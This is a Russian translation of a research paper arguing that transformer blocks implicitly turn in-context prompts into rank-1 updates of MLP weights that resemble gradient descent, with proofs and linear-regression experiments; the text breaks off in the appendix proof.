Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie

Прямой эфир

Русский

English

Войти / Регистрация

Cryptocurrencies: 9469 / Markets: 114759

Market Cap: $ 3 649 413 147 676 / 24h Vol: $ 111 462 614 249 / BTC Dominance: 58.888008521454%

Н Новости

[Перевод] Без тренировки, но с обучением: имплицитная динамика in-context learning

Аннотация

Одной из наиболее примечательных особенностей Large Language Models (LLM) является их способность к in-context learning — обучению в контексте. В частности, на этапе инференса LLM может усваивать новые паттерны без какого-либо дополнительного обновления весов, если эти паттерны представлены в виде примеров в промпте, даже если эти паттерны не встречались во время обучения. Механизмы, за счёт которых это возможно, всё ещё во многом остаются неизвестными.

В данной работе мы показываем, что комбинация слоя self-attention с MLP позволяет трансформер-блоку неявно модифицировать веса MLP-слоя в зависимости от контекста. Мы утверждаем на основе теоретического анализа и экспериментов, что этот простой механизм может объяснять, почему LLM способны обучаться в контексте, а не только во время тренировки модели. В частности, мы демонстрируем, что при ряде упрощающих допущений трансформер-блок неявно преобразует контекст в low-rank обновление весов MLP-слоя.

1. Введение

Large Language Models (LLM) и архитектура трансформер произвели революцию в области машинного обучения и, вероятно, окажут такое же влияние на множество других сфер — промышленность, науку и искусство. Однако, несмотря на столь значительный эффект, механизмы, за счёт которых LLM приобретают эмерджентные свойства, делающие их столь полезными, остаются в значительной степени теоретической загадкой.

В этой работе мы фокусируемся на способности LLM к in-context learning (ICL) — обучению в контексте — после того, как процесс тренировки модели полностью завершён. Речь идёт о способности усваивать знания из примеров, которые не встречались в обучающей выборке, но предоставляются модели уже на этапе инференса через промпт.

Исторически в машинном обучении умение извлекать паттерны из серии примеров трактовалось как динамический процесс обновления весов модели по мере того, как она «потребляет» эти примеры в рамках некоторой оптимизационной процедуры. Однако в случае in-context learning отсутствует явное обновление весов, которое могло бы объяснить эмерджентную динамическую природу обученных LLM, способных реорганизовывать или переконфигурировать себя под влиянием инструкций из пользовательского промпта.

Эта загадочная и крайне полезная способность LLM привела исследователей к гипотезе о существовании неявного механизма обновления весов, происходящего во время инференса, когда модель «потребляет» промпт. Более того, недавние исследования показали, что трансформер-блоки могут неявно реализовывать разновидность стохастического градиентного спуска при обработке контекста.

В данной работе мы исследуем эту интуицию о неявных обновлениях весов, но идём противоположным путём. Вместо того чтобы использовать путь сильной абстракции и рассматривать только простые toy-модели, мы предлагаем сфокусироваться на ключевых свойствах контекстной обработки и показать, что attention-слои играют в этом центральную роль.

Мы рассматриваем обобщение трансформер-блока, которое называем контекстным блоком. Мы показываем, что слои с таким контекстуальным свойством, будучи объединёнными со стандартными нейронными сетями, неявно преобразуют контекст в обновление весов самого первого слоя стека нейросети.

Мы выводим явную формулу для этого неявного обновления, и оказывается, что это обновление можно выразить как low-rank матрицу ранга 1. Это приводит нас к выводу, что такие контекстные слои — например, self-attention — в комбинации с нейронной сетью фактически выполняют неявный fine-tuning весов MLP, где апдейт вычисляется напрямую из контекста.

Основные элементы работы:

Мы вводим понятие контекстного блока, образованного контекстным слоем, «надстроенным» над нейросетью, — тем самым обобщая блок трансформера.
Мы показываем, что для контекстных блоков выход токена в присутствии контекста совпадает с выходом той же нейросети без контекста, но с матрицей весов, обновлённой low-rank матрицей.
Вывод явной формулы для неявного обновления весов нейросети, индуцированного контекстом, и анализ влияния контекста на параметры модели.
Показ связи обработки токенов с динамикой обучения: мы демонстрируем, что процесс «потребления» токенов эквивалентен неявному градиентному спуску в пространстве весов нейросети.

1.1 Смежные работы

Начиная с определённого масштаба, LLM демонстрируют способность обучаться на примерах, предоставленных в промпте. Эта эмерджентная способность была впервые чётко показана ещё в GPT-3 [3] и получила название In-Context Learning (ICL) [4].

В [12] работе авторы формулируют фундаментальный вопрос: действительно ли происходит истинное обучение во время инференса когда модель обрабатывает промрт, или же примеры в контексте просто помогают модели активировать уже выученные на этапе pre-training способности, без какого-либо нового обучения в момент инференса.

Более того, в работе[13] утверждается, что примеры в промпте служат лишь формой байесовского обусловливания (Bayesian conditioning), а не собственно обучением. В том же направлении [14] показывают, что замена меток в примерах промпта на случайные не приводит к значительному падению качества ICL, что подтверждает гипотезу: модель не учится заново, а извлекает уже заученные во время pre-training знания.

Однако [15] переосмысляют эту идею и показывают, что хотя это верно для малых моделей, крупные LLM начинают действительно обучаться на случайно переставленных метках внутри промпта. Аналогично, [16] демонстрируют, что возникновение настоящего ICL также сильно зависит от разнообразия данных на этапе pre-training в контексте LLM.

С другой стороны, [8] показывают, что трансформер-модели, прошедшие pre-training на задачах регрессии, способны по контексту «на лету» осваивать такие разные функции, как линейные функции, деревья решений и двухслойные нейросети. Эти эксперименты предоставляют контролируемую среду для проверки гипотезы о существовании истинного ICL.

В [17] показано, что трансформеры способны обучаться в режиме meta-optimization — когда сама модель начинает вести себя как мета-оптимизатор. Эта гипотеза проверяется в [6], где (в той же контролируемой постановке регрессии) трансформер с линейным вниманием, обученный в режиме gradient flow, сходится к мета-оптимизатору и ведёт себя как градиентный спуск.

Одновременно работы [7], [9] и [10] демонстрируют теоретические механизмы, в которых потребление примеров через промпт во время инференса может быть неявно связано с шагами градиентного спуска, но реализуется через implicit weight updates. Недавняя работа [11] также показывает, что при использовании chain-of-thought в промпте эффект аналогичен многократным шагам стохастического градиентного спуска.

Однако все эти теоретические модели предполагают узкий класс сценариев, например, линейные слои и prompt, построенные на основе регрессионных пар. Как показано в [18] и [19], эти предположения недостаточно реалистичны, и авторы выявили различия между истинным ICL и градиентным спуском, выполняемым через fine-tuning на примерах из prompt. Совсем недавно [20] подтвердили, что ICL демонстрирует генерализационное преимущество по сравнению с традиционным fine-tuning.

В данной работе мы развиваем концепцию ICL, объясняя её через механизм implicit weight updates, соответствующих своеобразной неявной динамике обучения. Однако мы отказываемся от ограничений классических моделей, которые делают предположения о том, что контекстное обучение происходит в слоях self-attention. Вместо этого мы предлагаем более общую модель, в которой механизм обновления весов переносится на MLP-слой внутри трансформер-блока, а не на attention-механизм [7, 9, 10].

2. Контекстные блоки

В этом разделе мы абстрагируем некоторые ключевые свойства трансформеров. В частности, вводим понятие контекстного слоя (contextual layer), которое обобщает слой self-attention в трансформерных блоках. В этой постановке контекстный блок (contextual block) — это композиция контекстного слоя со стандартной нейросетью, обобщающая понятие трансформерного блока. Далее мы доказываем основной теоремный результат: контекст в контекстных блоках действует как низкоранговый fine-tuning-апдейт весов нейросети. Для простоты мы формулируем результаты для нейросети без skip-connection; случай со skip-connection аналогичен, но технически сложнее и полностью разобран в Приложении A.

Мы называем контекстным слоем слой сети A(⋅) , который может принимать на вход одиночный вектор и выдавать выход A(x) ; либо, опционально, может дополнительно принимать контекст (например, последовательность токенов, изображение и т. п.) вместе с вектором , выдавая выход A([C,x]) . Заметим, что далее мы часто будем опускать явное обозначение конкатенации [C,x] во входе контекстного слоя и просто писать A(C,x) , имея в виду .

Как прототипический и направляющий пример контекстного слоя рассмотрим слой self-attention в трансформерном блоке, где контекст — это инструкционный промпт, состоящий из последовательности контекстных токенов C=[c_1,…,c_n] , а — query-токен, по которому LLM делает предсказание. Вместе и образуют контекстуализированный входной промпт [C,x]=[c_1,…,c_n,x] , то есть конкатенацию контекстных токенов и query-токена. Мы полагаем A(C,x) выходом слоя self-attention для последнего токена . Таким образом, и A(C,x) , и A(x) лежат в одном и том же выходном векторном пространстве. Контекстные слои порождают контекстуальные векторы, что позволяет определить разность ΔA(C):=A(C,x)−A(x) между выходом слоя с контекстом и без него.

Мотивируясь этим обобщением слоя self-attention как контекстного слоя, мы теперь обобщаем и понятие целого трансформерного блока, вводя контекстный блок:

Определение 2.1. Контекстный блок — это композиция T_W=M_W∘A , где — контекстный слой, а M_W — нейросеть; т. е. M_W(z)=f_θ(Wz+b) , где и — веса первого полносвязного (dense) слоя, а f_θ(z) — «остальная часть» нейросети.

Следующая теорема утверждает, что контекстный блок преобразует подмножество Y⊂C контекста в неявное обновление весов нейросети так, что становится W+ΔW(Y) , где информационное содержание переносится в веса через апдейт ΔW(Y) . В некотором смысле, контекстные слои загружают в веса сети параметры, соответствующие контекстной части , неявно добавляя к весам низкоранговое обновление ΔW(Y) . А именно, выход контекстного блока на полном контексте совпадает с выходом того же блока на контексте $C\setminus Y$ ¹, если убран из , но «вшит» в веса через апдейт ΔW(Y) .

Теорема 2.2. Рассмотрим контекстный блок T_W=M_W∘A , как выше: он образован контекстным слоем и полносвязным слоем M_W с матрицей весов . Для заданных контекста и входа влияние некоторой части Y⊂C контекста на выход контекстного блока неявно соответствует обновлению весов ранга-1 первого слоя M_W : W+ΔW(Y) . А именно,

$T_{W}(C,x) = T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y,\, x\bigr)$ $\text{where }\; \Delta W(Y) = \frac{\bigl(W\,\Delta A(Y)\bigr)\,A(C\setminus Y,x)^T} {\|A(C\setminus Y,x)\|^{2}} , \tag{1}$

где $ΔA(Y)=A(C,x)−A(C\setminus Y,x)$ — контекстный вектор, ассоциированный с . Заметим, что ΔW(Y) имеет ранг 1, поскольку WΔA(Y) — столбцовый вектор, а $A(C\setminus Y,x)^T$ — строковый вектор.

Доказательство. Утверждение следует из прямого вычисления, где мы используем обозначение M_W(z)=f_θ(Wz+b) , где и — веса первого dense-слоя сети M, а f_θ — остальная часть сети. В этих обозначениях по определению

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = M_{\,W+\Delta W(Y)}\!\left(A(C\setminus Y, x)\right) \tag{2}$ $= f_{\theta}\!\left((W+\Delta W(Y))\,A(C\setminus Y, x) + b\right) \tag{3}$ $= f_{\theta}\!\left( W\,A(C\setminus Y, x) + \Delta W(Y)\,A(C\setminus Y, x) + b \right). \tag{4}$

Подставляя теперь ΔW(Y) из определения в формуле (1) и используя тождество $\frac{z^T}{\lVert z\rVert^{2}}\, z = 1$ , получаем

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = f_{\theta}\!\left( W\,A(C\setminus Y, x) + \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^T} {\|A(C\setminus Y, x)\|^{2}}\,A(C\setminus Y, x) + b \right) \tag{5}$ $= f_{\theta}\!\left( W\big(A(C\setminus Y, x) + \Delta A(Y)\big) + b \right) \tag{6}$

Поскольку по определению контекстного вектора $A(C\setminus Y,x)+ΔA(Y)=A(C,x)$ , в итоге имеем

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = f_{\theta}\!\left(W\,A(C,x)+b\right) = M_{W}\!\left(A(C,x)\right) = T_{W}(C,x) \tag{7}$

Замечание 2.3. Наша теорема утверждает, что любой контекстный слой порождает неявную «передачу» веса из промпта в первый слой нейросети, тем самым неявно модифицируя поведение предобученной нейросети. Среди возможных реализаций контекстных слоёв (например, self-attention, RNN или рекуррентные слои с локальным вниманием, как в [21]) одни могут лучше вносить полезные модификации весов, чем другие. Представляется интересным оценить «порождающую» силу контекстного слоя с точки зрения специфической формы неявных обновлений весов, заданной нашей теоремой, и структуры , задаваемой контекстным слоем.

Отметим, что при Y=C (весь контекст) теорема даёт формулу, позволяющую «переложить» всю контекстную информацию в матрицу весов ; а именно:

Следствие 2.3.1. В обозначениях выше полный контекст может быть перенесён в веса нейросети следующим обновлением:

$T_{W}(C,x) = T_{\,W+\Delta W(C)}(x), \quad \text{with }\; \Delta W(C) = \frac{(W\,\Delta A)\,A(x)^{T}}{\|A(x)\|^{2}} , \tag{8}$

где ΔA=A(C,x)−A(x) — контекстный вектор, а имеет ранг 1, поскольку WΔA — столбцовый вектор, а A(x)^T — строковый.

Замечание 2.4. Формулу «передачи весов» (1) можно переписать через объединение/конкатенацию контекстов, положив $D=C\setminus Y$ ; тогда

$T_{W}(D \cup Y, x) = T_{\,W+\Delta W(Y)}(D, x). \tag{9}$

В Приложении A мы обобщаем Теорему 2.2 на сети со skip-соединениями, что обычно имеет место для стандартных трансформерных блоков. В разделе 4 мы экспериментально проверяем теоретические результаты на классическом конкретном примере.

Динамика неявного обучения в ICL

Когда контекст C=[c_1,…,c_n] — это последовательность токенов, итеративное применение Следствия 2.3.1 выявляет неявную динамику обучения, порождённую влиянием каждого контекстного токена на выход контекстного блока. Начав с начальной матрицы весов W_0 для первого полносвязного слоя нейросети M_W , можно рассматривать обновления весов, соответствующие поэтапному добавлению токена в контекст:

$T_{W_{0}}\!\bigl(c_{1}, x\bigr) = T_{\,W_{0}+\Delta W_{0}(c_{1})}\!(x)$ $T_{W_{0}}\!\bigl(c_{1}, c_{2}, x\bigr) = T_{\,W_{0}+\Delta W_{0}(c_{1}, c_{2})}\!(x)$ $\begin{aligned} &\vdots\\ T_{W_{0}}(c_{1},\ldots,c_{n},x) &= T_{\,W_{0}+\Delta W_{0}(c_{1},\ldots,c_{n})}(x) \end{aligned}$

Отсюда получаем следующую последовательность «контекстных» весов:

$W_{1} = W_{0} + \Delta W_{0}(c_{1}) \tag{10}$ $W_{2} = W_{0} + \Delta W_{0}(c_{1}, c_{2}) \tag{11}$ $\begin{gather} \vdots \tag{12}\\ W_{n} = W_{0} + \Delta W_{0}(c_{1},\ldots,c_{n}) \tag{13} \end{gather}$

что по построению сходится к эффекту полного контекста на веса MLP; а именно

$T_{W_{n}}(x) = T_{W_{0}}(c_{1},\ldots,c_{n}). \tag{14}$

Следующее утверждение показывает, что эта неявная динамика обучения подобна онлайн-градиентному спуску, где токены играют роль обучающих примеров, а функция потерь на каждом шаге меняется в зависимости от рассматриваемого в этот момент токена.

Предложение 3.1. В указанной выше нотации итеративный процесс обновления весов можно представить в виде стохастических шагов градиентного спуска

$W_i = W_{i-1} - h\, \nabla_{W} L_i\!\left(W_{i-1}\right) \tag{15}$

где скорость обучения $h = 1/\lVert A(x)\rVert^{2}$ , а потери на шаге заданы

$L_i(W) = \operatorname{trace}\!\big(\Delta_i^{T} W\big), \tag{16}$

причем $\Delta_i = W_{0}\Big( A(c_{1},\ldots,c_{i},x) - A(c_{1},\ldots,c_{i+1},x) \Big)\, A(x)^{T}.$

Доказательство. Во-первых, для последовательности W_i , определённой в (10)–(13), имеем

$W_{i+1} - W_{i} = \Delta W_{0}(c_{1},\ldots,c_{i+1}) - \Delta W_{0}(c_{1},\ldots,c_{i}) \tag{17}$ $= \frac{\,W_{0}\Big(A(c_{1},\ldots,c_{i+1},x)-A(c_{1},\ldots,c_{i},x)\Big)\,A(x)^{T}\,} {\lVert A(x)\rVert^{2}} \tag{18}$ $= -\,h\,\Delta_i, \tag{19}$

где $h = 1/\lVert A(x)\rVert^{2}$ и $\Delta_i = W_{0}\Big( A(c_{1},\ldots,c_{i},x) - A(c_{1},\ldots,c_{i+1},x) \Big)\, A(x)^{T}.$

Отсюда

$W_{i+1} = W_i - h\,\Delta_i = W_i - h\,\nabla_{W}\,\operatorname{trace}\!\big(\Delta_i^{T} W\big), \tag{20}$

поскольку в общем случае $\nabla_{W}\,\operatorname{trace}\!\big(A^{T}W\big) = A.$

Заметим, что измеряет вклад добавления токена $c_{i+1}$ к частичному контексту c_1,…,c_i . Если c_i не влияет на выход, т.е. $A(c_1,…,c_i,x)−A(c_1,…,c_{i+1},x)=0$ , то и соответствующее обновление ∇_WL_i(W)=Δ_i зануляется. На Рис. 2 показано на простом эксперименте, что эти градиенты затухают по мере того, как динамика обучения сходится к использованию полного контекста.

Замечание 3.2. Интересно, что можно вывести другую, но схожую, неявную динамику обучения W_0,W_1,…,W_n , рассматривая частичные обновления, которые на каждом шаге сохраняют неизменным выход контекстного блока при совместном использовании с оставшимися токенами: $T_{W_{i}}\!\bigl(c_{i+1}, \cdots, c_{n}, x\bigr) = T_{W_{0}}\!\bigl(c_{1}, \ldots, c_{n}, x\bigr).$ Эта динамика описана в Приложении B. Отличие в том, что в общем случае её уже нельзя представить как градиентные шаги, но она приводит к факторизационной формуле для итоговой матрицы весов W_n , такой что $T_{W_{n}}(x) = T_{W_{0}}(c_{1},\ldots,c_{n},x).$

4. Эксперименты

Чтобы проверить Теорему 2.2 на практике, мы рассматриваем корректно поставленную задачу обучения класса функций по примерам из контекста (in-context). Эта задача независимо изучалась в [6, 22]. В этих работах показано, что трансформер можно обучить с нуля выполнять in-context-обучение линейных функций. Иными словами, если модель трансформера была обучена на классе линейных функций, то после обучения она способна по одним лишь примерам в промпте выучивать новые, ранее невиданные линейные функции (выбранные из распределения, близкого к использованному при обучении) с качеством, сопоставимым с оптимальным оценивателем наименьших квадратов.

В [6, 22] авторы сосредотачивались на том, насколько трансформеры устойчивы (или, напротив, неустойчивы) к сдвигам распределения между обучающими данными модели и промптами на этапе инференса. Это не наша цель. Поскольку те работы уже подтвердили, что трансформеры действительно умеют учиться в контексте для линейных моделей, мы используем здесь схожий экспериментальный протокол, чтобы проверить, что контекстные промпты можно эффективно «перенести» в обновление весов по формуле (8). Мы проверяем, что предсказание обученной модели при наличии in-context-промпта идентично предсказанию модели с весами MLP, модифицированными согласно формуле (8), но без доступа к самому in-context-промпту.

4.1 Постановка эксперимента (Setup)

На высоком уровне, по аналогии с [6], мы обучаем простой трансформер на примерах промптов, состоящих из пар вход–выход вида $(x_{1},\, h(x_{1}),\, \ldots,\, x_{N},\, h(x_{N}),\, x_{\text{query}})$ , где $x_i,x_{query}$ сэмплируются независимо и одинаково распределёнными i.i.d. из распределения D_x , а функция независимо сэмплируется из распределения над функциями в классе $\mathcal{H}.$ В частности, мы берём $\mathcal{H}$ как класс линейных функций, так что $h(x) = \langle w, x \rangle$ , причём $x_i,\; x_{\text{query}},\; w \sim \mathcal{N}(0, I_d).$ Цель обучающегося в контексте (in-context learner) — по промпту из таких пар предсказать $\hat{y}\!\left(x_{\text{query}}\right)$ так, чтобы $\hat{y}\!\left(x_{\text{query}}\right) \approx h\!\left(x_{\text{query}}\right).$

Каждый обучающий промпт индексируется задачей τ∈N и имеет вид:

$P_{\mathcal{T}} = \bigl(x_{\mathcal{T},1},\, h_{\mathcal{T}}(x_{\mathcal{T},1}),\, \ldots,\, x_{\mathcal{T},N},\, h_{\mathcal{T}}(x_{\mathcal{T},N}),\, x_{\mathcal{T},\text{query}}\bigr).$

Мы можем записать такой промпт как матрицу-встраивание $E_{\mathcal{T}}$ , так что

$E_{\mathcal{T}} := \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} & x_{\mathcal{T},\mathrm{query}} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N} \rangle & 0 \end{pmatrix} \in \mathbb{R}^{(d+1)\times (N+1)}.$

В нотации раздела 2 на $E_{\mathcal{T}}$ удобно смотреть как на контекстуализированный входной промпт, где

$C = [c_{1},\ldots,c_{N}] = \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N} \rangle \end{pmatrix}$ $\text{and}\quad x = \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix}$

так что $E_{\mathcal{T}}=(C,x)$ . Пусть — параметры модели. Предсказание модели $\hat{y}\!\left(x_{\mathcal{T},\mathrm{query}}\right)$ для токена запроса $x_{\mathcal{T},\mathrm{query}}$ , query — это последний компонент выхода по токену запроса у одного блока² трансформера, то есть

$\hat{y}\!\left(x_{\mathcal{T},\,\mathrm{query}}\right) = T_{W}(C,x)_{(d+1)} \tag{21}$

Заметим, что при таком определении размерности T_W(C,x) и $T_{W+\Delta W}(x)$ совпадают. Мы обучаем трансформер по лоссу на батче размера ,

$\hat{\mathcal{L}}(\theta) = \frac{1}{2B}\sum_{\tau=1}^{B} \left(\hat{y}_{\mathcal{T},\mathrm{query}} - \big\langle w_{\mathcal{T}},\, x_{\mathcal{T},\mathrm{query}}\big\rangle \right)^{2}.$

4.2 Проверка теоремы 2.2

Пусть трансформер обучен на линейных функциях. Мы показываем, что in-context-промпт можно «перенести» в обновление весов, определённое формулой (8). А именно, хотим показать, что

$T_{W}(C,x) = T_{\,W+\Delta W}(x);$

или, что то же самое,

$T_{W}\!\left( \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} & x_{\mathcal{T},\mathrm{query}} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1}\rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2}\rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N}\rangle & 0 \end{pmatrix} \right) = T_{\,W+\Delta W}\!\left( \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix} \right)$

где вычисляется по формуле (8). На рис. 1 сравниваются значения валидационного лосса при предсказании с использованием in-context-промпта и при предсказании с эквивалентным обновлением весов. Лоссы для обеих настроек приведены по эпохам; также показан увеличенный фрагмент графика для ясности.

4.3 Сходимость ΔW

Мы ставим эксперименты, чтобы понять, как адаптируются веса по мере того, как модель обрабатывает in-context-промпт в рамках неявной (имплицитной) динамики обучения, описанной в Предложении 3.1. В частности, мы хотим проверить, что по мере достижения сходимости по контексту градиентные обновления стремятся к нулю.

Мы строим последовательность $\bigl\{\, (\Delta W)_i \,\bigr\}_{i=1}^{N}$ где каждое (ΔW)_i задано формулами (10)–(13). То есть выполняется

$T_{W}(C_i, x) = T_{\,W+(\Delta W)_i}(x)$

где

$C_i = [c_{1},\ldots,c_{i}] = \begin{pmatrix} x_{\mathcal{T},1} & \cdots & x_{\mathcal{T},i} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},i} \rangle \end{pmatrix} \quad\text{and}\quad x = \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix}.$

Рисунок 1: кривые лосса на обучении и валидации. Здесь «Validation loss (computed via )» означает лосс, вычисленный с использованием $T_{W+\Delta W}(x)$ ; т. е. предсказание обученной модели при подаче только $x_{query}$ , но с весами MLP, модифицированными на согласно уравнению (8).
Слева: кривая тренировочного лосса и обе кривые валидационного лосса.
Справа: увеличенный фрагмент валидационного лосса, вычисленного обоими способами, т. е. через T_W(C,x) и через $T_{W+\Delta W}(x)$ .

Если W_0 — это выученные веса первого полносвязного слоя, то из Следствия 2.3.1 следует, что для любого i=1,2,…, N

$(\Delta W)_i = \frac{(W_{0}\,\Delta A_i)\,A(x)^{T}}{\lVert A(x)\rVert^{2}}, \qquad \text{where }\; \Delta A_i :=A(c_{1},\ldots,c_{i},x) - A(x).$

Интуитивно ожидается, что по мере того как «in-context-learner» обрабатывает всё большую часть промпта, относительное изменение в (ΔW)_i должно уменьшаться. На Рисунке 2 мы подтверждаем, что это действительно так.

Для заданного контекста C_i=[c_1,…,c_i] длины мы строим маржинальное изменение в (ΔW)_i при добавлении ещё одного токена контекста $c_{i+1}$ , что даёт $(ΔW)_{i+1}$ для контекста $C_{i+1}=[c_1,…,c_i,c_{i+1}]$ . Это маржинальное изменение измеряется в L2-норме; т. е. для каждой длины контекста по оси откладывается величина, соответствующая обновлениям градиента из Предложения 3.1:

$\left\| \nabla_{W} L_i(W) \right\|_{2} = \left\|\, (\Delta W)_{i+1} - (\Delta W)_i \,\right\|_{2}.$

Мы наблюдаем на Рисунке 2, что градиентные обновления убывают и исчезают по мере того, как неявная динамика обучения продвигается к полному контексту, что соответствует сходящемуся процессу градиентного спуска.

4.4 Сравнение с fine-tuning

Мы предобучаем модель-трансформер (один стандартный блок трансформера без MLP skip-connection) на примерах вида

Здесь берём d=2 и N=50 .

Для fine-tuning мы создаём один новый тестовый пример с использованием $ω_{test}$ , который модель не видела на предобучении, хотя $ω_{test}$ сэмплируется из того же распределения, из которого при предобучении берутся все $ω_\tau$ . Обозначим этот пример $\mathcal{D}_{FT}$ :

$\mathcal{D}_{FT} = \begin{pmatrix} x_{1} & \cdots & x_{M} & x_{\mathrm{test}} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{M} \rangle & 0 \end{pmatrix}$

Теперь для каждого i=1,2,…,M формируем датасет для fine-tuning, беря первые элементов из $\mathcal{D}_{FT}$ и игнорируя последний столбец, который является нашим тестовым query. То есть, для всех i=1,…,M :

$\mathcal{D}^{\,i}_{FT} = \begin{pmatrix} x_{1} & x_{2} & \cdots & x_{i} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \langle \omega_{\mathrm{test}}, x_{2} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{i} \rangle \end{pmatrix}$

Мы инициализируем трансформер предобученными весами, затем выполняем fine-tuning с помощью стохастического градиентного спуска (learning rate 0.01), подавая по одному примеру за раз в том же порядке, в каком они обрабатываются in-context. Во время fine-tuning мы обновляем только матрицу весов слоя MLP. Поэтому для каждого i=1,…,M мы выполняем шагов градиентного спуска с размером батча 1. После fine-tuning на всех примерах вычисляем loss (функцию потерь) fine-tuned-модели на тестовом query $(x_{test},0)$ . Это мы называем «GD test loss после шагов».

Рисунок 2: Сходимость (ΔW)_i . По мере обработки всё большей части контекста относительное изменение весов стремится к нулю. Для длины контекста i>2 график выше показывает среднюю разность $\left\|\, (\Delta W)_{i+1} - (\Delta W)_i \,\right\|_{2}$ и стандартную ошибку по 100 независимым прогонам.

Аналогично, для каждого мы считаем перенос весов (weight transfer), как определено в уравнении (8), с контекстом

$C_i = \begin{pmatrix} x_{1} & x_{2} & \cdots & x_{i} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \langle \omega_{\mathrm{test}}, x_{2} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{i} \rangle \end{pmatrix}$

и тем же тестовым запросом $x=(x_{test},0)$ . Используя из формулы переноса весов, вычисляем loss на $(x_{test},0)$ . Это мы называем « test loss» для длины контекста .

На рисунке 3 ниже мы строим график зависимости fine-tuning GD test loss от weight-transfer test loss. На графике показано среднее по 100 независимым прогонам. Несмотря на различия, видно, что оба процесса обучения (fine-tuning и неявная динамика обновления весов) уменьшают loss сходным образом.

5. Заключение и ограничения

Наш подход к механике трансформерного блока, лежащей в основе ICL, улучшает предыдущие работы тем, что не накладывает ограничений на архитектуру слоя self-attention для извлечения неявной динамики обучения в весовом пространстве. Ранние теоретические работы, сосредоточенные на внутреннем устройстве трансформеров, выводили подобную неявную динамику, но лишь при жёстких допущениях о слое self-attention (например, линейное внимание и/или одна «голова»; см. [9–11, 19]). Фактически наши результаты остаются верными, даже если слой self-attention заменить другими формами контекстных слоёв — например, слоем RNN или любым слоем, который может принимать вход и, опционально, контекст. Это неожиданно, потому что наш анализ подсказывает: ICL в меньшей степени связан с внутренностями self-attention и в большей — с тем, что обычные нейросети способны переносить модификации в пространстве входов в структуру своих весов. Это глубокое свойство отмечалось в ряде теоретических работ и помогает понять, почему глубокие нейросети так хорошо обобщают [23–25].

Однако, хотя наш подход ближе к реальности, так как мы убираем ограничения на слой self-attention, мы всё ещё анализируем упрощённую модель в следующем смысле, что и составляет основное ограничение нашего анализа:

Рисунок 3:

Наше выводимое утверждение действительно только для одного трансформер-блока, так как основная теорема количественно оценивает влияние контекста только на выход самого последнего входного токена, а не на полный выход всего блока трансформера
Наша основная теорема анализирует влияние контекста только относительно первого сгенерированного токена. Она не охватывает полную механику генерации за пределами этого шага.

Несмотря на эти ограничения, мы надеемся, что эта работа поможет лучше понять таинственные явления, возникающие во время инференса у LLM.

A. Контекстные блоки со skip-соединениями

Рассмотрим теперь случай контекстных блоков со skip-соединениями, охватывающий стандартный Pre-LN-блок трансформера, как, например, описано в [26].

Определение A.1. Контекстный блок со skip-соединением — это слой вида

$T(C,x) = x + A(C,x) + W'\, g_{\theta}\!\big(W\,A(C,x) + b\big) + b' \tag{22}$

где g_θ — произвольная дифференцируемая модель, а A(C,x) — контекстный слой.

Мы можем обобщить Теорему 2.2 на этот случай, разрешив обновлять не только матрицу весов первого слоя , но и сдвиг последнего слоя.

Теорема A.2. Рассмотрим контекстный блок со skip-соединением, как выше, т. е.

$T(C,x) = x + A(C,x) + W'\, g_{\theta}\!\big(WA(C,x) + b\big) + b' \tag{23}$

Пусть — контекстный слой, а — любая дифференцируемая модель. Тогда влияние части контекста на выход контекстного блока неявно соответствует обновлению весов ранга 1 для матрицы первого слоя , а также обновлению смещения последнего слоя $b'(Y) = b' + \Delta b'(Y)$ так, что

$T_{W,\,b'}(C,x) = T_{\,W(Y),\,b'(Y)}\!\bigl(C\setminus Y,\, x\bigr), \tag{24}$

Обновления параметров задаются формулами

$\Delta b'(Y) = \Delta A(Y), \tag{25}$ $\Delta W(Y) = \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^{T}} {\lVert A(C\setminus Y, x)\rVert^{2}}, \tag{26}$

где $\Delta A(Y) = A(C,x) - A(C\setminus Y, x$ ) — контекстный вектор, соответствующий . Заметим, что имеет ранг 1, поскольку — столбец, а $A(C\setminus Y, x)^{T}$ — строка.

Доказательство. Результат следует из прямого вычисления. В принятой нотации по определению

$T_{W(Y),\,b'(Y)}\!\bigl(C\setminus Y, x\bigr) = x + A(C\setminus Y, x) + W'\, g_{\theta}\!\left(\,(W+\Delta W(Y))\,A(C\setminus Y, x) + b\right) + b' + \Delta b'(Y)$ $=\, x + A(C\setminus Y, x) + \Delta b'(Y)$ $+\, W' \, g_{\theta}\!\big( W\,A(C\setminus Y, x) + \Delta W(Y)\,A(C\setminus Y, x) + b \big) + b'$

